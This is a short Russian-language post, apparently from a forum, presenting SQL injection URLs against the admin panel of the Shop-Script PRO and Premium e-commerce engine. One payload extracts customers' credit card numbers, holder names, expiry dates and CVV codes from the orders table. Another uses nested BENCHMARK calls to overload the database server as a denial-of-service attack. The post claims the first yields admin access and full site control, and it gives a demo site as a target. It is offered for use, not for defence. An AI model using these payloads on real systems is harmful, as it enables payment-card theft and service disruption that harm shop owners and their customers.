Если в Pro версии движка интернет магазина Shop Script в браузере вбить:
http://адрес/admin.php?dpt=reports&sub=product_report&categoryI D=-82+union+select+cc_number,cc_oldername,cc_expires, cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
То вы сможете попасть в админку
Если Safe Mode будет отключён то можете получить полный контроль над сайтом.Этому багу подвержены версии Shop-Script PRO и Shop-Script Premium все версии.
Также возможно проведение DDos атаки путём
http://адрес/admin.php?dpt=conf&sub=setting&settings_groupID=BE NCHMARK(10000000,BENCHMARK(10000000,md5(current_da te)))
Вот пример сайта
http://www.shop-script-demo.com/pro/admin.php?dpt=reports&sub=product_report&categoryI D=-82+union+select+cc_number,cc_oldername,cc_expires, cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
Только тут включён SafeMod
